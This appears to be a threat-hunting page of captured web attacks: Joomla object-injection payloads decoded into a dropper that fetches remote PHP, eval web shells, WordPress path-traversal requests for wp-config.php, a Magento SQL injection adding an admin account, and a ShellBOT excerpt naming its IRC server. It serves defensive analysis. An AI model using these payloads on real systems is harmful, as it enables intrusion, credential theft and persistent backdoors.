Web attacks

Hunting for web attackers

Hunting for IPs that attacks web servers


IP discovered

213.42.28.x
27.153.186.x
195.154.194.x
27.153.186.x
107.172.80.x
210.209.85.x
62.75.156.x
185.57.252.x
94.23.30.x
71.181.80.x
91.121.27.x
...



PHP code upload



GET }__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0
disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:1182:\"eval(
base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2xvb
GEucGhwIiA7DQokZnA9Zm9wZW4oIiRjaGVjayIsIncrIik7DQpmd3JpdGUoJGZwLGJhc2U2NF9kZWNvZGUoJ1
BEOXdhSEFOQ21WamFHOGdJbTFoWjI1dmJTQmhkWFJ2SUdOeVpXRjBJR1pwYkdWeklqc05D
ZzBLWm5WdVkzUnBiMjRnYUhSMGNGOW5aWFFvSkhWeWJDbDdEUW9KSkdsdElEMGdZM1Z5YkY5cGJtbDBLQ1IxY
213cE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOVNSVlJWVWs1VVV
rRk9VMFpGVWl3Z01TazdEUW9KWTNWeWJGOXpaWFJ2Y0hRb0pHbHRMQ0JEVlZKTVQxQlVYME5QVGs1RlExUlVT
VTFGVDFWVUxDQXhNQ2s3RFFvSlkzVnliRjl6WlhSdmNIUW9KR2x0TENCRFZWSk1UMUJVWD
BaUFRFeFBWMHhQUTBGVVNVOU9MQ0F4S1RzTkNnbGpkWEpzWDNObGRHOXdkQ2drYVcwc0lFTlZVa3hQVUZSZlN
FVkJSRVZTTENBd0tUc05DZ2x5WlhSMWNtNGdZM1Z5YkY5bGVHVmpLQ1JwYlNrN0RRb0pZM
1Z5YkY5amJHOXpaU2drYVcwcE93MEtmUTBLSkdOb1pXTnJOVDBrWDFORlVsWkZVbHNuUkU5RFZVMUZUbFJmVW
s5UFZDZGRJQzRnSWk5c2FXSnlZWEpwWlhNdmJHVm5ZV041TDJ4dlp5OXFjeTV3YUhBaUlE
c05DaVIwWlhoME5TQTlJR2gwZEhCZloyVjBLQ2RvZEhSd2N6b3ZMMmRvYjNOMFltbHVMbU52YlM5d1lYTjBaU
zloZHpWallTOXlZWGNuS1RzTkNpUnZjRFU5Wm05d1pXNG9KR05vWldOck5Td2dKM2NuS1R
zTkNtWjNjbWwwWlNna2IzQTFMQ1IwWlhoME5TazdEUXBtWTJ4dmMyVW9KRzl3TlNrN0RRcEFkVzVzYVc1cktG
OWZSa2xNUlY5ZktUc05DajgrJykpOw0KZmNsb3NlKCRmcCk7'));JFactory::getConfig();
exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd

GET //libraries/lola.php

GET //libraries/legacy/log/js.php

After first base64 decode
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/lola.php" ;
$fp=fopen("$check","w+");
fwrite($fp,base64_decode
('PD9waHANCmVjaG8gIm1hZ25vbSBhdXRvIGNyZWF0IGZpbGVzIjsNCg0KZnVuY3Rpb24ga
HR0cF9nZXQoJHVybCl7DQoJJGltID0gY3VybF9pbml0KCR1cmwpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9SRVRVUk5UU
kFOU0ZFUiwgMSk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0NPTk5FQ1RUSU1FT1VULCAxMCk7DQoJY3VybF9zZXRvcHQoJ
GltLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCAxKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfSEVBREVSLCAwKTsNCglyZ
XR1cm4gY3VybF9leGVjKCRpbSk7DQoJY3VybF9jbG9zZSgkaW0pOw0KfQ0KJGNoZWNrNT0kX1NFUlZFUlsnRE9DVU1FTlRfUk9PV
CddIC4gIi9saWJyYXJpZXMvbGVnYWN5L2xvZy9qcy5waHAiIDsNCiR0ZXh0NSA9IGh0dHBfZ2V0KCdodHRwczovL2dob3N0YmluL
mNvbS9wYXN0ZS9hdzVjYS9yYXcnKTsNCiRvcDU9Zm9wZW4oJGNoZWNrNSwgJ3cnKTsNCmZ3cml0ZSgkb3A1LCR0ZXh0NSk7DQpmY
2xvc2UoJG9wNSk7DQpAdW5saW5rKF9fRklMRV9fKTsNCj8+'));
fclose($fp);

After second base64 decode
echo "magnom auto creat files";

function http_get($url){
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close($im);
}
$check5=$_SERVER['DOCUMENT_ROOT'] . "/libraries/legacy/log/js.php" ;
$text5 = http_get('https://ghostbin.com/paste/aw5ca/raw');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);
@unlink(__FILE__);
?

PHP code upload: Variation



}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0
disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:234:\"
file_put_contents($_SERVER[\"DOCUMENT_ROOT\"].chr(47).\"info.php\",\"|=|\\x3C\".chr(63).\"php
\\x24mujj=\\x24_POST['h'];if(\\x24mujj!=''){\\x24xsser=
base64_decode(\\x24_POST['z0']);@eval(\\\"\\\\\\x24safedg=\\x24xsser;\\\");}\");JFactory::getConfig();exit;\";s:19:\"
cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql
\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}~\xd9"

}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0
disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"
feed_url\";s:168:\"eval(base64_decode(ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nLy5pbmRle
C5waHAnLCc8P3BocCBAZXZhbCgkX1JFUVVFU1RbeG9dKTsnKTs));
JFactory::getConfig();exit;\";s:19:\"
cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"
JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86


WebFuck T0PHackTeam www.t0p.xyz



GET /web_manage/fckeditor/editor/filemanager/connectors/php/connector.php?Command=CreateFolder&Type;=
Image&CurrentFolder;=%2F91683711.asp&NewFolderName;=91683711

GET /web_manage/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type;=
Image&CurrentFolder;=%2F91683711.asp&NewFolderName;=91683711


WordPress



GET /category/security.html&sa=U&ved=0ahUKEwjbiK2L5szQAhVHnRoKHb9bAwo4lgEQFgjBATAg&
amp;usg=AFQjCNFD2nxKzamo6ECnbws7PFmNG8cKXg/wp-admin/admin-
GET /ajax.php?action=revslider_show_image&img;=../wp-config.php
GET //wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php
GET //force-download.php?file=../wp-config.php
GET //wp-content/themes/markant/download.php?file=../../wp-config.php
GET //wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
GET //wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php
GET //wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php
GET /web-scanners.html&sa=U&ved=0ahUKEwiYs_D-mtrSAhXl6YMKHY-tCg84ZBAWCGIwDg
&usg=AFQjCNGqHoeLxLLiNcrqvqN0SPMp_1EOvA/wp-admin/admin-ajax.php?action=revslider_show_image&img;=../wp-config.php
GET /web-scanners.html&sa=U&ved=0ahUKEwiYs_D-mtrSAhXl6YMKHY-tCg84ZBAWCGIwDg
&usg=AFQjCNGqHoeLxLLiNcrqvqN0SPMp_1EOvA/wp-admin/admin-ajax.php


POST /web_manage/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?
Command=FileUpload&Type;=File&CurrentFolder;=%2F


POST /wp-content/plugins/Login-wall-etgFB/login_wall.php?login=
cmd&z3;=U29ja2V0SW9udHJvbC5waHA%3d&z4;=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d


Magento Mass Importer



/files//magmi/web/download_file.php?file=../conf/magmi.ini
/files//web/download_file.php?file=../conf/magmi.ini
/files/admin/Cms_Wysiwyg/directive/?forwarded=true&isIframe;=true&___directive=e3tibG9jayB0eXBlPSJhZG1pbmh0bWwvcmVwb3J0X3NlYXJjaF9ncmlkIn19&filter;=
bnVtX3Jlc3VsdHNbZnJvbV09MCZudW1fcmVzdWx0c1tmaWVsZF9leHByXT0xPTIpO0RFTEVURSBGUk9NIGBhZG1pbl91c2VyYCBXSEV
SRSB1c2VyX2lkID0gMzM7ICBERUxFVEUgRlJPTSBgYWRtaW5fcm9sZWAgV0hFUkUgdXNlcl9pZCA9IDMzOyAgSU5TRVJUIElOVE8gYGF
kbWluX3VzZXJgIChgdXNlcl9pZGAsIGBmaXJzdG5hbWVgLCBgbGFzdG5hbWVgLCBgZW1haWxgLCBgdXNlcm5hbWVgLCBgcGFzc3dvcmRg
LCBgY3JlYXRlZGAsIGBtb2RpZmllZGAsIGBsb2dkYXRlYCwgYGxvZ251bWAsIGByZWxvYWRfYWNsX2ZsYWdgLCBgaXNfYWN0aXZlYCwgY
GV4dHJhYCkgVkFMVUVTICAoMzMsJ21hZ2VudG8nLCAnZGVzaWduJywgJ2Rlc2lnbkBtYWdlbnRvY29tbWVyY2UuY29tJywgJ2Rlc2lnbi
csICdkODkyYTkyNWExZjdkYTdlMGJhMWE5ODU5OTA1ODczYjpycCcsICdudWxsJywgJ251bGwnLCAnbnVsbCcsIDEsIDAsIDEsICdOOyc
pOyAgSU5TRVJUIElOVE8gYGFkbWluX3JvbGVgIChgcGFyZW50X2lkYCwgYHRyZWVfbGV2ZWxgLCBgc29ydF9vcmRlcmAsIGByb2xlX3R5
cGVgLCBgdXNlcl9pZGAsIGByb2xlX25hbWVgKSBWQUxVRVMgKDEsIDIsIDAsICdVJywgMzMsICdkZXNpZ24nKTs7IC0tIA==
/files/downloader/
/files/api/xmlrpc


Shellbot


//index.inc.php?cmd=curl%20-C%20-%20-O%20http%3A%2F%2F77.72.150.206%2Frvpoud%2Fattachments%2Fsection%2Fxnight.txt%3Bmv%20xnight.txt
%20..%2F..%2F..%2F..%2F..%2F..%2Fwp-admin%2F.xnight.php HTTP/1.1" 404 - "-" "Mozilla/5.0
(Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
night.tx #!/usr/bin/perl
#
# ShellBOT by: devil__
# Greetz: Puna, Kelserific
#
...
...
...
########## CONFIGURACAO ############

my @ps = ("/usr/local/apache/bin/httpd -DSSL","/sbin/syslogd","[eth0]",
"/sbin/klogd -c 1 -x -x","/usr/sbin/acpid","/usr/sbin/cron","[bash]");
my $processo = $ps[rand scalar @ps];

$servidor='irc.darkproject.com.br' unless $servidor;
my $porta='6667';
my @canais=("#dark");
my @adms=("ODIN","subzid");

# Anti Flood ( 6/3 Recomendado )
my $linas_max=10;
my $sleep=5;

my $nick = getnick();
my $ircname = getident2();
my $realname = "dark project";
#chop (my $realname = `uname -n`);
...
...
...